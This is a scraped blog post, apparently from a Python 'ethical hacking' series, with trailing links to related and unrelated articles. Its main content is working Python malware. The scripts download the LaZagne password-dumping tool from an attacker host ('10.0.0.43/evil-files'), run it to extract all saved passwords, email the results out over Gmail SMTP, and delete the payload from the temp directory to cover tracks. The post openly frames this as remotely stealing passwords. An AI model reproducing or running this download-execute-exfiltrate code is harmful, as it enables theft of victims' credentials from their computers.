DOWNLOAD_FILE

  • Download files on a system.
  • Once packaged properly will work on all operating systems.
  • Simple but powerfull.

Can be used in many situations:

  • download _file + execute_command = download_and_execute
  • download_file + execute_and_report = download_execute_and_report
  • ...etc
#!/usr/bin/env python
import requests def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content) download("https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg")

DOWNLOAD_EXECUTE_AND_REPORT

  • Download files on a system.
  • Execute a command that uses this file.
  • Report results in our email.
  • Cross multi-Platform!!

Ex: remotely steal all stored passwords on a computer!

Using the LaZagne tool:https://github.com/AlessandroZ/LaZagne

lazagne.exe --help

Use the following command to find all the passwords in the current system.

 lazagne.exe all

Steal saved passwords remotely

#!/usr/bin/env python
import requests
import smtplib
import subprocess def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content) def send_mail(email, password, message):
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, message)
server.quit() download("http://10.0.0.43/evil-files/lazagne.exe")
result = subprocess.check_output("lazagne.exe all", shell=True)
print(result.decode())
send_mail("aaaa@gmail.com", "", result)

Optimize the Python Script - Interacting with the file system. The evil file will be downloaded in the temp directory and removed after executed.

#!/usr/bin/env python
import os
import smtplib
import subprocess
import requests
import tempfile def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content) def send_mail(email, password, message):
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, message)
server.quit() temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
download("http://10.0.0.43/evil-files/lazagne.exe")
result = subprocess.check_output("lazagne.exe all", shell=True)
print(result.decode())
send_mail("aaaa@gmail.com", "", result)
os.remove("lazagne.exe")

Python Ethical Hacking - Malware Analysis(4)的更多相关文章

  1. Python Ethical Hacking - Malware Analysis(1)

    WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...

  2. Python Ethical Hacking - Malware Analysis(3)

    Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess im ...

  3. Python Ethical Hacking - Malware Analysis(2)

    Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import r ...

  4. Python Ethical Hacking - Malware Packaging(4)

    Converting Python Programs to Linux Executables Note: You can not execute the program on Linux by do ...

  5. Python Ethical Hacking - Malware Packaging(3)

    Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073a ...

  6. Python Ethical Hacking - TROJANS Analysis(4)

    Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Conver ...

  7. Python Ethical Hacking - TROJANS Analysis(2)

    DOWNLOAD & EXECUTE PAYLOAD A generic executable that downloads & executes files. Disadvantag ...

  8. Python Ethical Hacking - TROJANS Analysis(1)

    TROJANS A trojan is a file that looks and functions as a normal file(image, pdf, song ..etc). When e ...

  9. Python Ethical Hacking - Malware Packaging(2)

    PACKAGING FOR WINDOWS FROM LINUX For best results package the program from the same OS as the target ...

随机推荐

  1. rust 生命周期2

    之前定义的结构体,都是不含引用的. 如果想定义含引用的结构体,请定义生命周期注解 #[warn(unused_variables)] struct ImportantExcerpt<'a> ...

  2. Redis快照原理详解

    本文对Redis快照的实现过程进行介绍,了解Redis快照实现过程对Redis管理很有帮助. Redis默认会将快照文件存储在Redis当前进程的工作目录中的dump.rdb文件中,可以通过配置dir ...

  3. docker在配置tomcat和spring boot远程调试

    服务器部署项目后又时可能与本地开发效果不一致,怎么实现远程调试配置? docker中怎么进行配置? docker中tomcat实现远程调试配置 1. 配置docker-compose.yml CATA ...

  4. AOP的概念

    1.1 什么是AOP? 软件开发一直在寻求更加高效.更易维护甚至更易扩展的方式.软件开发的目的,最终是为了解决各种需求,包括业务需求和系统需求.使用面向对象方法,我们可以对业务需求等普通关注点进行很好 ...

  5. [转]理解神经网络:从神经元到RNN、CNN、深度学习

    神经网络是目前最流行的机器学习算法之一.随着时间的推移,证明了神经网络在精度和速度方面,比其他的算法性能更好.并且形成了很多种类,像CNN(卷积神经网络),RNN,自编码,深度学习等等.神经网络对于数 ...

  6. maven在idea中的配置的注意点

    1.基本的配置查看尚硅谷的文档链接在下 链接:https://pan.baidu.com/s/18gwll6gU38qNH2P01To-lQ 提取码:oq40 2.注意点: 需要将新建项目的配置也修改 ...

  7. node+ajax实战案例(1)

    1.mysql入门 1.1.数据库相关概念 1.1.1.什么是数据? 描述事物的符号记录称为数据,描述事物的符号可以是数字.文字.声音.图片.视频等,有多种表现形式,都可以经过数字化后存入计算机 1. ...

  8. maven测试配置是否成功

    测试maven 是否安装成功 win+r 输入 cmd 调出doc 输入 mvn -v maven安装完成测试报错 后来发现是java-home在path中配置缺少bin,如下图 这个是 java-h ...

  9. 一文读懂 Redis 分布式部署方案

    为什么要分布式 Redis是一款开源的基于内存的K-V型数据库,因为内存访问速度快,一般被用来做系统的缓存. Redis作为单机部署能够支持业务简单,数据量不大的系统需求,但在实际应用中,一旦系统规模 ...

  10. Redis系列(十):数据结构Set源码解析和SADD、SINTER、SDIFF、SUNION、SPOP命令

    1.介绍 Hash是以K->V形式存储,而Set则是K存储,空间节省了很多 Redis中Set是String类型的无序集合:集合成员是唯一的. 这就意味着集合中不能出现重复的数据.可根据应用场景 ...